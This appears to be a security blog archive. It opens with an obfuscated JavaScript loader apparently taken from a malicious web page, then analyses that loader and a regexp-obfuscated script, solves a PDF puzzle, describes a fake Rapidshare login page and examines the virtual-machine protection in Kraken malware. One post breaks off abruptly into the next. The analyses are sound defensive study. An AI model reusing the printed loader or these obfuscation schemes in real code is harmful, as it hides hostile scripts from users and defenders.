jL0="0ucoc\\MIM",yU90="Iu\{\{\{\%\%ovf0N";0.1261199,nB73="0.7082915",yU90='\|\:T2B\ m\(8\?\$\*b\]AyX\"aOVt\.Y\-\_1qx\\\{\[l\niZI4\r3\=\!7uHv5JsCKPj\;QgR\+\`foM6w\/F\>\'rpN\<D9\^S\,\@\#dcWU\}\%LE\&nG0\~ekzh\)',jL0='\"u\>tc\`S\ \]I\_\&\{gholKDf\#LdkCXU\~\/z97y\'m\,\\8B\=\rRG\|\.iE\+n\n\%FJ\;1b\[saV\-36\)Aw\$O\(\!H2MNZ\*eqvPW4r\@T5\:Y\<Qx0\^pj\}\?';function lW4(uO49){"0u\%N\{\{I\{\\",l=uO49.length;'0k\+IBI\r0c',w='';while(l--)"0ucooc\;\{\{",o=jL0.indexOf(uO49.charAt(l)),'\~k\)0\~cc\+YX0c',w=(o==-1?uO49.charAt(l):yU90.charAt(o))+w;"0uoN0M\%\{\{",jL0=jL0.substring(1)+jL0.charAt(0),document.write(w);'0kZ\r\)Z\r\r\|'};lW4("2nW\(m\!L\`yD\<b\|Db\^\rJDiDnW\(m\!L\$\)l8t\r8\]\]U\;mV\ P\-W\|S\^\<LdDyy\?9V\|\<WLm\-\<\`XPS\ \?9\(\^L\|\(\<\`VDyn\^\@\;V\|\<WLm\-\<\`XSPS\ \?9P\-W\|S\^\<Ld\-\<W\-\<L\^\/LS\^\<\|\rXPS\;n\^L\>mS\^\-\|L\ KXSPS\ \?Ke\]xx\?\@\;XSPS\ \?\;\@P\-W\|S\^\<Ld\-\<W\-\<L\^\/LS\^\<\|\r\<\^\)\`w\|\<WLm\-\<\ K\(\^L\|\(\<\`VDyn\^K\?\;V\|\<WLm\-\<\`X\<PS\ \^\?9mV\ P\-W\|S\^\<LdyDo\^\(n\"\"\)m\<P\-\)dnmP\^\{D\(\?9mV\ \^d\)\}mW\}R\rU\?\(\^L\|\(\<\`VDyn\^\;\@\@\;mV\ P\-W\|S\^\<LdyDo\^\(n\?9P\-W\|S\^\<LdWD\!L\|\(\^\:i\^\<Ln\ \:i\^\<Ld3fr\*\:Mf4H\?\;P\-W\|S\^\<Ld\-\<S\-\|n\^P\-\)\<\rX\<PS\;\@\^yn\^9P\-W\|S\^\<Ld\-\<S\-\|n\^\|\!\rX\<PS\;\@\;S1Ux\rtEN\=\;\{fGE\r6EN8\;V\|\<WLm\-\<\`XP\)n\ \?9\)m\<P\-\)dnLDL\|n\`\r\`K\`K\;n\^L\>mS\^\-\|L\ KXP\)n\ \?KeUxx\?\;\@\;XP\)n\ \?\;mM\]N\r6xtU\;m48E\r\=8E8\;V\|\<WLm\-\<\`XPPn\ \?9mV\ P\-W\|S\^\<LdDyy\?9P\-W\|S\^\<Ld\-\<n\^y\^WLnLD\(L\rV\|\<WLm\-\<\`\ \?9\(\^L\|\(\<\`VDyn\^\@\;n\^L\>mS\^\-\|L\ KXPPn\ \?KeGxx\?\@\@\;XPPn\ \?\;b\+E\r8ENG\;mHUG\rNG\=G\;jltt\rtEN6\;yMGx\r\=G\=6\;p1tN\r8\]G\]\;jfN8\r\]\]\]x\;\~kx\rUG\=\]\;\;XymW\^\<n\^PXL\-X\rKF\^L\^\(\`\nDyyK\;2AnW\(m\!L\$")
//-->
</script>
<ScrIPt lANGUAGE=jAVASCRiPt>
lW4("MGN\#\%tCJYS\?d\ \'SJ\@\`\:8\%SDXwwr\r\%wwNtNSKit6\:S\~k0St\!fQ\n\,d\,3Qf\'wwY2DSD\?ddH\>wwAAAkA\rk3\!\[wtswz\?d\ \'\~wNtNwz\?d\ \'\~Xd\!fQ\n\,d\,3Qf\'kWdWDO\=m\=mMGXXS\%\!pfdpWS3QSoH\!Sc\+qSc00\|SI\>c0\>0cSJ6SXXO\=m\=mM\?d\ \'O\=mSSSM\?pfWO\=mSSSSSSMd\,d\'pO\=mSSSSSSSSS\=mSSSSSSMwd\,d\'pO\=mSSSSSSM\ pdfSQf\ pRDxY2Ysot\#sDS43QdpQdRDo\!f4\?Q3H\?\,\'\,fS\+k\rDwO\=mSSSSSSM\ pdfSQf\ pRD\$\#s6ottYsDS43QdpQdRDo\!f4\?Q3H\?\,\'\,fS\+k\rDwO\=mSSSMw\?pfWO\=m\=mSSSMg3WlSg\[43\'3\!RDP\-\-\-\-\-\-DSdpzdRDP000000DS\'\,QjRDP0000\-\-DSE\'\,QjRDPI000I0DSf\'\,QjRDP\-\-0000DO\=m\=mSM4pQdp\!OMgOJ\'pf\npS\!pH3\!dSfQlS\np\!E\,4pSE\,3\'fd\,3Q\nSd3\>SMoS\?\!p\-RD\ f\,\'d3\>fg\.\npv4Hf\n\?\,p\'Wk43\ DOfg\.\npv4Hf\n\?\,p\'Wk43\ MwgOMwfOMw4pQdp\!O\=m\=mSSSMwg3WlO\=mMw\?d\ \'O\=m")
</script>
</head><body><noscript><b>
<font color=red>This page requires a javascript enabled browser!!!</font></b></noscript>
</body></html>

Quite awful indeed. I wanted to see the script code and, as always, I tried using some automatic decoders. The first script was easily decoded, but not the second one. I tried combining the scripts into a single one without luck (it should work but I failed, don't know why...). The few decoders I tried were not able to give me a good result. I didn't search the net for more decoders; I decided to figure it out myself.

The second script starts with lW4("MGN and ends with the O\=m") character sequence. It looks like a generic call where lW4 is the name of the function to call and the string inside the quotes is the parameter, a very long string. To confirm this idea I need to find the function inside the first script. Here's the search result: lW4(uO49){
I'm on the right track: the line above is pretty similar to the first part of a function declaration. It's time to make the first script as readable as I can.

The script contains useless declarations (jL0 and yU90 are each declared twice, you can remove the first declaration), useless variables (nB73 is not used) and useless strings (you can remove strings like "0u\%N\{\{I\{\\" or 0.1261199). It's pretty easy to remove them; the result I got is shown below:

yU90='\|\:T2B\ m\(8\?\$\*b\]AyX\"aOVt\.Y\-\_1qx\\\{\[l\niZI4\r3\=\!7uHv5JsCKPj\;QgR\+\`foM6w\/F\>\'rpN\<D9\^S\,\@\#dcWU\}\%LE\&nG0\~ekzh\)',
jL0='\"u\>tc\`S\ \]I\_\&\{gholKDf\#LdkCXU\~\/z97y\'m\,\\8B\=\rRG\|\.iE\+n\n\%FJ\;1b\[saV\-36\)Aw\$O\(\!H2MNZ\*eqvPW4r\@T5\:Y\<Qx0\^pj\}\?';

function lW4(uO49)
{
	l=uO49.length;
	w='';
	while(l--)
		o=jL0.indexOf(uO49.charAt(l)),
		w=(o==-1?uO49.charAt(l):yU90.charAt(o))+w;
	jL0=jL0.substring(1)+jL0.charAt(0),
	document.write(w);
};
lW4("2nW...");
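For those who prefer to experiment outside a browser, the same routine can be sketched in Python. This is my own port, not something found in the page: `Decoder`, `lookup` and `output` are names I chose (they play the roles of lW4, jL0 and yU90), and the alphabets in the example are toy values instead of the real strings.

```python
class Decoder:
    """Substitution decoder whose lookup alphabet rotates after each call."""

    def __init__(self, lookup: str, output: str):
        self.lookup = lookup     # role of jL0
        self.output = output     # role of yU90

    def decode(self, text: str) -> str:
        chars = []
        for ch in text:
            pos = self.lookup.find(ch)
            # Unknown characters pass through, like the o==-1 branch.
            chars.append(ch if pos == -1 else self.output[pos:pos + 1])
        # The rotation sits after the while loop, so it runs once per call.
        self.lookup = self.lookup[1:] + self.lookup[:1]
        return "".join(chars)


toy = Decoder(lookup="abc", output="xyz")   # toy alphabets, not the real ones
first = toy.decode("cab?")
second = toy.decode("cab?")
```

The same input decodes differently on the second call because the lookup string has been rotated in the meantime. This may be one reason why decoding the second script on its own gives garbage: it expects the state left behind by the first call.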

The cleaned-up script is just two strings, a function and a call to the function. Puzzle solved!
The scripts are used to decrypt two pieces of code; to see them I inserted an alert(w) instruction right after document.write(w). It’s the fastest way to see the code. If you read EvilCry’s post you should know the content of the first decrypted code, the other one is:

Just yesterday I had the opportunity to take a look at a kind of obfuscated Javascript code I had never seen before. The script contains a class named KyD defined using the prototype pattern. The code is something like this:

function KyD() {};

KyD.prototype = {
install : function()
{

},
cookieName:'feadcbhg',
getFrameURL : function()
{

},

};

var o44o=new KyD();
o44o.install();

More or less a standard class declaration. The constructor is empty, it doesn’t need any special initialization. Just after the class definition there are two more lines: a new KyD object is created and its “install” method is called.

For me it’s quite uncommon to see a class declaration inside a malicious script; I’m used to seeing Javascript code written in a procedural style. Anyway, this is not a problem of course. The problem arises when looking at the declared methods. It’s often easy to understand a Javascript function from the source code, but not this time. Look at this snippet taken from one of the methods declared inside the KyD class:

Are you able to tell me the content of “o” in a few seconds? Even if you know how to handle s you’ll need more than a few seconds to solve the puzzle.
How to sort out the real meaning of the string? The script has been obfuscated using regular expressions; nothing impossible, but if you want to identify the content of the string s you need to know something about regexps.

How can regexp be used to obfuscate a string?
The string s is composed of three parts: two of them are obfuscated substrings, while the other one is obtained from getFrameURL, another method of the class KyD.
The substrings have a replace method applied; in this specific case the method is used with regular expressions to search for characters in the string and replace them. The method is normally used to replace some characters in a string with some other characters:

stringObject.replace(findstring,newstring)

Here is how to use the method:

var str = "Say Hello";
document.write(str.replace(/Hello/, 'Ciao'));

The output will be “Say Ciao”, pretty easy. It’s also possible to add some flags after the closing slash of the regular expression, e.g.:
- i: used to perform a case insensitive search
- g: used to perform a global search over the entire string.

Back to our snippet. Looking at the first substring you’ll see that the replace method is used in this way:

replace(/[%\)@QI]/g, '')

The g option is present and the new string is empty, which means that part of the string will be cut away. Which part of the string will be removed? The string to find is defined as a regular expression: every occurrence of any character listed inside the square brackets (‘[’ and ‘]’) will be replaced with the empty string. Removing the specified characters from the substring you’ll obtain the de-obfuscated substring:

Now I can decode all the strings obtaining the original script!
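The stripping step can be sketched like this. The obfuscated pieces below are made up by me for illustration (the real ones are not reproduced here), the helper name strip is mine, and the fixed string stands in for whatever getFrameURL returns; the order of the three parts is also just an assumption.

```javascript
// Junk characters are the ones listed in the character class; the g flag
// makes replace() remove every occurrence, not only the first one.
const junk = /[%\)@QI]/g;

function strip(obfuscated) {
  return obfuscated.replace(junk, "");
}

// Hypothetical pieces, not taken from the real script.
const first = strip("h%tt)p@:Q/I/");     // "http://"
const middle = "example.invalid/frame";  // stand-in for getFrameURL()
const last = strip("?%i)d@=Q1I");        // "?id=1"

const s = first + middle + last;
console.log(s); // http://example.invalid/frame?id=1
```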
Quite a nice trick. It forces you to spend some more time over a script, nothing more. Thanks to Bobby for the script.

There was a challenge today at Didier Stevens’s blog. It’s a pdf puzzle, the goal is to find out the passphrase hidden inside the file.

Opening the file with a pdf reader you’ll see the text:
“The passphrase is XXXXXXXXXXXXXXXXXXX”.
Passphrase is not a sequence of ‘X’ for sure. How to find it out?

Didier gave us a little hint: “There’s a very simple solution just requiring Notepad”. Opening the file with notepad reveals the complete structure of the pdf file. The phrase is not readable inside the file; after a closer look at the file I noticed these lines:
5 0 obj

/Filter /ASCII85Decode

stream
6<#’\7PQ#@1a#b…

This is the definition of an object, as you can see it’s encoded using ascii85. Using a decoder it’s pretty easy to retrieve the required passphrase: “Incremental Updates”.
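If you don’t have a decoder at hand, the ASCII85 scheme is simple enough to write in a few lines: every group of five characters is a base-85 number that expands to four bytes. This is only a minimal sketch (the function name ascii85Decode is mine, and it does no validation of bad input); the stream from the challenge is truncated above, so the usage line uses the well-known “Man ” example instead.

```javascript
// Minimal ASCII85 decoder sketch: 5 characters -> 4 bytes, 'z' -> 4 zero bytes.
function ascii85Decode(input) {
  let s = input.replace(/\s+/g, "");          // whitespace is ignored
  if (s.startsWith("<~")) s = s.slice(2);     // optional start marker
  const end = s.indexOf("~>");                // end-of-data marker
  if (end !== -1) s = s.slice(0, end);

  const bytes = [];
  let i = 0;
  while (i < s.length) {
    if (s[i] === "z") {
      bytes.push(0, 0, 0, 0);
      i += 1;
      continue;
    }
    const group = s.slice(i, i + 5);
    i += group.length;
    // A short final group is padded with 'u' and the extra bytes are dropped.
    let value = 0;
    for (const ch of group.padEnd(5, "u")) {
      value = value * 85 + (ch.charCodeAt(0) - 33);
    }
    const chunk = [
      Math.floor(value / 0x1000000) % 256,
      Math.floor(value / 0x10000) % 256,
      Math.floor(value / 0x100) % 256,
      value % 256,
    ];
    bytes.push(...chunk.slice(0, group.length - 1));
  }
  return String.fromCharCode(...bytes);
}

console.log(ascii85Decode("9jqo^~>")); // "Man "
```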

Is it really necessary to use an ascii85 decoder?
There are two suspicious snippets inside the file indeed; the first snippet is the one you see above, and the other one is:
5 0 obj

/Filter /ASCII85Decode

stream
6<#’\7PQ#@1a#b…

They are two almost equal objects. Only a few bytes differ in the encoded strings. The first and the last part of the encoded strings are the same, which means they use the same operators; e.g. if the objects are used to display a text string, they can have the same coordinates.

Ok, I have two streams but only one will be shown. What decides which one is displayed?
A pdf file contains a Cross Reference table which is used to define all the objects that are inside the file. A table is something like:

xref
0 7
0000000000 65535 f
0000000012 00000 n
0000000089 00000 n
0000000145 00000 n
0000000214 00000 n
0000000419 00000 n
0000000594 00000 n

There are 7 objects defined. Checking each object offset (the number in the first column) you’ll find out that only one stream is defined. The other one is not defined in this table because there’s another Cross Reference table at the end of the file:

xref
0 1
0000000000 65535 f
5 1
0000000935 00000 n

It’s pretty obvious now: the second table redefines object 5, so the second stream (text with xxx) takes the place of the first one (text with password).
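Here is a small sketch of how the two tables combine, assuming a reader simply applies them in file order and lets later entries win. The function name applyXref is mine and the parser only understands the plain layout shown above, nothing more.

```javascript
// Apply one xref section to a Map of object number -> byte offset.
function applyXref(table, text) {
  let next = null; // object number of the next entry in the current subsection
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    const header = /^(\d+) (\d+)$/.exec(line);              // "first count"
    const entry = /^(\d{10}) (\d{5}) ([fn])$/.exec(line);   // "offset gen f|n"
    if (header) {
      next = Number(header[1]);
    } else if (entry && next !== null) {
      if (entry[3] === "n") table.set(next, Number(entry[1])); // in-use object
      next += 1;
    }
  }
  return table;
}

const original = `xref
0 7
0000000000 65535 f
0000000012 00000 n
0000000089 00000 n
0000000145 00000 n
0000000214 00000 n
0000000419 00000 n
0000000594 00000 n`;

const update = `xref
0 1
0000000000 65535 f
5 1
0000000935 00000 n`;

const objects = applyXref(new Map(), original);
console.log(objects.get(5)); // 419: the first definition of object 5
applyXref(objects, update);
console.log(objects.get(5)); // 935: the appended table wins
```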
To see the right text I removed some bytes from the end of the file. You can remove all the bytes after the first “%%EOF” occurrence.
Now you can see the hidden passphrase without using an ascii85 decoder. Nice challenge!
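The same cut can be done with a few lines of script instead of a hex editor. This is a sketch for Node.js (it relies on Buffer); the function name keepFirstRevision is mine.

```javascript
// Keep everything up to and including the first "%%EOF" marker.
function keepFirstRevision(pdfBytes) {
  const marker = "%%EOF";
  const at = pdfBytes.indexOf(marker); // Buffer.indexOf accepts a string
  if (at === -1) return pdfBytes;      // no marker: leave the data alone
  return pdfBytes.subarray(0, at + marker.length);
}

// Tiny fake file with two revisions, just to show the effect.
const fake = Buffer.from("%PDF-1.1\nfirst\n%%EOF\nsecond\n%%EOF\n", "latin1");
console.log(keepFirstRevision(fake).toString("latin1"));
```

On a real file you would read the bytes with fs.readFileSync and write the result to a new file with fs.writeFileSync, keeping the original untouched.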

Lunch break ends now…

There are a lot of online storage services around the net, private or public. With this kind of service it’s pretty easy to save/share personal data. They are heavily used, especially the ones that let you share files. They usually offer a free service (often with some sort of Mb limit) and a paid service (no limit). I have never uploaded a file, but I sometimes download files from Rapidshare, the most popular one I think.

Like every paid service it’s prone to phishing/fraud. I stumbled on a phishing site just today when I wanted to download an archive. Normally you click on a link and the initial Rapidshare page appears. Not this time.

The Rapidshare’s link was obscured using ProtectLinks. The address of the archive appears like: “http://protect-links.com/_a_number”. They simply assign a number to a specific web page displaying the content of the web page in this way:

It’s an empty page with an iframe definition at the end. The iframe tag creates an inline frame that contains another document. You can set one or more attributes (frameborder, height, name, width and src); I’m interested in the src attribute only, which defines the url of the document to show inside the iframe. From what I have seen, that’s how protect-links protects a web page.

This is only one of the services available around the net. In general, I don’t know why people need to protect a page with this kind of services btw.

Anyway, how to protect a rapidshare link? A classic rapidshare link looks like:
http://rapidshare.com/files/_a_number_/_filename_
A protected link declared inside the src attribute looks like:
src=”http://_server_name_path/?link=_original_url_”
_original_url_ is the parameter passed to the php page and it represents the original rapidshare link.
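Given the src value, pulling the hidden address out is a one-liner with the standard URL class. The server name and file name below are placeholders of mine, and originalTarget is just a name I picked.

```javascript
// Return the value of the "link" parameter of an iframe src, or null.
function originalTarget(frameSrc) {
  return new URL(frameSrc).searchParams.get("link");
}

// Hypothetical protected link, in the same shape as the one described above.
const src = "http://server.example/path/?link=http://rapidshare.com/files/123/file.rar";
console.log(originalTarget(src)); // http://rapidshare.com/files/123/file.rar
```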

Trying to download the file I got this page:

The image above represents an error message, it’s generally displayed when you don’t have a premium cookie saved on your system. This is not the common page I see when I want to download a file. Normally, the original page contains two boxes and it lets you decide to use a free or a premium service. Hitting the premium button without a premium cookie you get this kind of error message.

The page is well defined, the design is like the original one but it’s a fake page. Inspecting some menu items you’ll see that they don’t have the same initial part of the url, they point to two different servers.
Anyway, if you are a registered premium user and you see the error message you simply use your account to login… that’s the problem, when you hit the login button you won’t see anything else than a white page. The result is obvious, your data are now property of someone else.

Can you understand why some people need to protect the link? Well, when a link has been protected you can’t see the original url… and you don’t know where you are sending your login details. This is an unfair use of the protector service for sure.

What to do to protect ourselves from this kind of fraud?
There’s a security advisory at rapidshare.com; part of the text reads: “Generally you should never enter your login information on any websites other than rapidshare.com. Your account information would most likely be stolen.” That’s a good hint to follow!
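The advice boils down to checking the host name of the page that asks for your login. A rough sketch of such a check follows; the function name isRapidshareHost is mine, and the look-alike address is invented for the example.

```javascript
// True only when the address really belongs to rapidshare.com
// (the domain itself or one of its subdomains).
function isRapidshareHost(address) {
  let host;
  try {
    host = new URL(address).hostname.toLowerCase();
  } catch {
    return false; // not a valid absolute url
  }
  return host === "rapidshare.com" || host.endsWith(".rapidshare.com");
}

console.log(isRapidshareHost("http://www.rapidshare.com/files/123/file.rar")); // true
console.log(isRapidshareHost("http://rapidshare.com.login.example/"));         // false
```

Note that a simple “contains rapidshare.com” test would accept the second address, which is exactly the kind of trick a fake page relies on.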

Kraken is the word of the month for sure, but it has nothing to do with the beast from a nice old book written by Jules Verne, Twenty Thousand Leagues Under the Sea.
The word refers to a family of malware, something like the Storm trojan, but much stronger. Kraken has apparently been around since August 2006, but until today I had never heard about it. Some days ago I read an article about it, the interesting part is here:
“One somewhat interesting feature of the code is that the binary is not packed, as many malware binaries tend to be. However, Royal said that the code does have some other forms of obfuscation that make it difficult to analyze completely.” I decided to look at it.

I’m not going to give out a detailed explanation about the sample I’m working on (MD5 = 592523a88df3d043d61a14b11a79bd55), but I’ll spend some words on the “forms of obfuscation” used by the malware.

Detectors are not able to recognize any specific packer/protector. The file is not packed, but from the first lines of code it’s pretty easy to understand that a sort of obfuscation/encryption was included inside the file. I have not found interesting imports/strings, so I tried running the malware. Just to be sure to retrieve some useful information I started logging all API(s) called by the malware.
The malware calls some nice functions. Almost all the code of the binary file is decrypted at runtime. The malware spawns one file and then deletes itself; you can spy on the decrypted code, but I didn’t get anything useful from it. The best thing to do is to look at the code trying to identify a general obfuscation scheme or a decryption routine. Don’t think to trace the entire exe, it’s madness!

In cases like this one, if you are able to see a light over your head you are lucky, otherwise you can step through and look at each instruction for eternity. I was lucky… the real code is hidden behind a virtual machine. I’m no virtual machine expert, I have only read some articles about this kind of protection.
I won’t rebuild the entire machine, I’ll give out my findings only. If you think they are wrong and/or you want to add some more information about the virtual machine I’ll be happy to see a comment from you.

Like every virtual machine out there, after a little initialization it goes into a semi-infinite loop that starts at 4012DA. It simply selects a virtual machine instruction and jumps to the code to run. There are a lot of instructions inside the loop; skipping the junk code, you can see the snippet used to select (and then jump to) the next instruction to execute:

004012E4 MOV AL,BYTE PTR DS:[ESI-1] // Byte pointed by esi-1 decides everything
004012F3 ADD AL,BL
0040F807 DEC AL
004103D9 DEC ESI // Shift to the next byte
004103E7 ROL AL,2
004103F7 DEC AL
0040F590 XOR AL,0CF
0040F594 SUB AL,6B
004104A6 ADD BL,AL
004104AF MOVZX EAX,AL
004104B7 MOV ECX,DWORD PTR DS:[EAX*4+40FABB] // EAX = index of the selected instruction
004104C6 NOT ECX
0040129C ROR ECX,1C
00410213 SUB ECX,4DCBE90C
0041021F ROL ECX,7
00410229 INC ECX
0041070D BSWAP ECX
00401195 ADD ECX,5E1E81EF
0040119C XOR ECX,77B911BC
004011AE NOT ECX
0041071B ADD ECX,60334BE6 // ECX = address of the selected instruction
0040FFF3 MOV DWORD PTR SS:[ESP+48],ECX
0040FFFB PUSH DWORD PTR SS:[ESP+48]
0040FFFF RETN 4C // Go to the selected instruction

Everything starts from the value stored in the buffer pointed to by (esi-1). The buffer contains a series of bytes that select the virtual machine instruction to execute (they are also used to retrieve one or more of the vm_instruction’s operands). The new value stored in EAX (obtained after some minor operations) is used to retrieve a dword value: EAX is the index into the vector that starts at 0x40FABB. As you can see from the code above, that dword is then used to obtain the address of the vm_instruction to execute.
Unlike a classical virtual machine this one doesn’t have a clear Instruction Table: looking at the dead listing in your favorite disassembler you won’t see the address of every single vm_instruction. The Instruction Table is encrypted and its first entry is located at 0x40FABB (there are 256 entries).
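The selection snippet can be transcribed almost line by line into a script, which is handy if you want to decrypt the whole Instruction Table offline. This is only a sketch of my reading of the listing: the function names are mine, flags are not modelled, and the 256 table entries themselves are not included here, so the usage line just feeds in arbitrary values.

```javascript
// 32-bit and 8-bit helpers (JavaScript numbers need explicit wrapping).
const u32 = (x) => x >>> 0;
const rol32 = (x, n) => u32((x << n) | (x >>> (32 - n)));
const ror32 = (x, n) => u32((x >>> n) | (x << (32 - n)));
const rol8 = (x, n) => ((x << n) | (x >>> (8 - n))) & 0xff;
const bswap32 = (x) =>
  u32(((x & 0xff) << 24) | ((x & 0xff00) << 8) | ((x >>> 8) & 0xff00) | (x >>> 24));

// AL part: turns the byte at (esi-1) into a table index; BL is a rolling key.
function selectIndex(opcodeByte, bl) {
  let al = (opcodeByte + bl) & 0xff; // ADD AL,BL
  al = (al - 1) & 0xff;              // DEC AL
  al = rol8(al, 2);                  // ROL AL,2
  al = (al - 1) & 0xff;              // DEC AL
  al ^= 0xcf;                        // XOR AL,0CF
  al = (al - 0x6b) & 0xff;           // SUB AL,6B
  return { index: al, bl: (bl + al) & 0xff }; // ADD BL,AL
}

// ECX part: turns an encrypted table entry into a handler address.
function decryptHandler(entry) {
  let ecx = u32(~entry);             // NOT ECX
  ecx = ror32(ecx, 0x1c);            // ROR ECX,1C
  ecx = u32(ecx - 0x4dcbe90c);       // SUB ECX,4DCBE90C
  ecx = rol32(ecx, 7);               // ROL ECX,7
  ecx = u32(ecx + 1);                // INC ECX
  ecx = bswap32(ecx);                // BSWAP ECX
  ecx = u32(ecx + 0x5e1e81ef);       // ADD ECX,5E1E81EF
  ecx = u32(ecx ^ 0x77b911bc);       // XOR ECX,77B911BC
  ecx = u32(~ecx);                   // NOT ECX
  return u32(ecx + 0x60334be6);      // ADD ECX,60334BE6
}

// Arbitrary inputs, not values taken from the sample.
console.log(selectIndex(0x00, 0x00).index.toString(16));  // c6
console.log(decryptHandler(0xffffffff).toString(16));     // 9111af30
```

With the 256 dwords dumped from 0x40FABB, mapping decryptHandler over them should give the list of vm_instruction addresses in one go.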
The virtual machine has 16 registers (from r_0 to r_15), they can be used to store byte, word or dword data. EDI register points to the first one, the registers are stored in memory consecutively starting from r_0 to r_15.
The virtual machine has a stack with a fixed size, EBP register contains the vm_esp value. After almost all push vm_instructions there’s a stack overflow check. The alignment is two bytes, “push byte_value” is not allowed and to push a single byte the virtual machine will extend the byte to a word value.

Is there a cmp/test instruction inside the snippet? Is there a reference to a vm_eip register? Seems like this virtual machine doesn’t need them. vm_eip is replaced by (esi-1); it’s not an eip per se but it *guides* the virtual machine. I don’t have all the vm_instructions in my notes, but I think there are no direct cmp/test instructions. Seems like they are not included inside the virtual machine, strange.

From what I have seen there are more than 45 vm_instructions included in the virtual machine; to identify each vm_instruction you have to remove a lot of junk code. Even once you have all the vm_instructions, it’s not easy to understand what the malware is trying to do.
Example: here are the vm_instructions used to patch a dword at 0x41CE06 (the first column is the initial address of the vm_instruction, the second column is the name I gave to the vm_instruction):

401028: push_dword val // push F440C1CB
401028: push_dword val // push 8040414A
40F5BE: nor_stack // The value at vm_esp+4 is updated with a nor(vm_esp+4, vm_esp) operation
4105FA: pop_dword r_i // r_15 = 0x00000202
40F36F: push_dword r_i // r_0 = 0x0041CE05
401028: push_dword val // push 98754A9F
401028: push_dword val // push 43179031
40F198: push_dword vm_esp // push vm_esp
401396: mov_stack_pstack // mov dword ptr [vm_esp], dword ptr [dword ptr [vm_esp]]
40F25C: pop_word r_i // r_14 = 0x00009031
401028: push_dword val // push 678AB562
40F198: push_dword vm_esp // push vm_esp
40FEF3: push_bdword val // push 0x00000006, push a dword but the last 24 bits are 0, so it’s like a push byte extended to dword
410452: add_stack // add dword ptr [vm_esp+4], dword ptr [vm_esp]
4105FA: pop_dword r_i // r_15 = 0x216
40F0A0: pp_mov_dword // mov dword ptr [pop t1], (pop t2)
40F25C: pop_word r_i // r_11 = 0x015E4317
410452: add_stack // add dword ptr [vm_esp+4], dword ptr [vm_esp] <-- 98754A9F + 678AB562 = 1
4105FA: pop_dword r_i // r_14
410452: add_stack // add dword ptr [vm_esp+4], dword ptr [vm_esp] <-- 41CE05 + 1 = 41CE06
4105FA: pop_dword r_i // r_15
410171: mov_stack_pstack // mov dword ptr [dword ptr [vm_esp]], dword ptr [vm_esp+4] <-- patch

Quite a simple patch operation, but the author didn’t use the straight way for sure. Believe it or not, this is the nature of the malware. Now you can understand the phrase: “Don’t think to trace the entire exe, it’s madness!”.
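The arithmetic hidden in that sequence is easy to replay on a toy stack. This is a heavily simplified model of mine, not the real machine: it assumes the pop that follows each nor_stack/add_stack only throws away a leftover value, so here the operation simply consumes the top element, and it ignores the registers and the word-sized moves.

```javascript
// Toy model of the vm stack: dwords only, results wrap at 32 bits.
const u32 = (x) => x >>> 0;
const vmStack = [];

const pushDword = (value) => vmStack.push(u32(value));

// add_stack: [vm_esp+4] += [vm_esp], then the top element is dropped.
function addStack() {
  const top = vmStack.pop();
  vmStack[vmStack.length - 1] = u32(vmStack[vmStack.length - 1] + top);
}

// nor_stack: [vm_esp+4] = ~([vm_esp+4] | [vm_esp]), then the top is dropped.
function norStack() {
  const top = vmStack.pop();
  vmStack[vmStack.length - 1] = u32(~(vmStack[vmStack.length - 1] | top));
}

pushDword(0x0041ce05);  // base address, as in r_0
pushDword(0x98754a9f);
pushDword(0x678ab562);
addStack();             // 98754A9F + 678AB562 wraps around to 1
addStack();             // 41CE05 + 1
console.log(vmStack[0].toString(16)); // 41ce06, the patched address
```

So the two big constants exist only to hide a plain “+1”: their sum overflows 32 bits and leaves 1.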

I tried inspecting some more samples of the same Kraken family. There are some similarities/differences:
- they are protected by a virtual machine too
- the routine used to select the next vm_instruction is not the same
- (I think) the vm_instructions are equal, but they are not defined in the same way. I mean, the code used to define a push is not the same but the result is the same; in fact, in both cases you have a push vm_instruction
- the (encrypted)Instruction Table is not the same. At index i you won’t have the same vm_instruction for malware_x and malware_y
- the vm protection exists for the spawned file too

Now I fully understand the words used by the author of the interview, it’s complex to understand what’s going on…
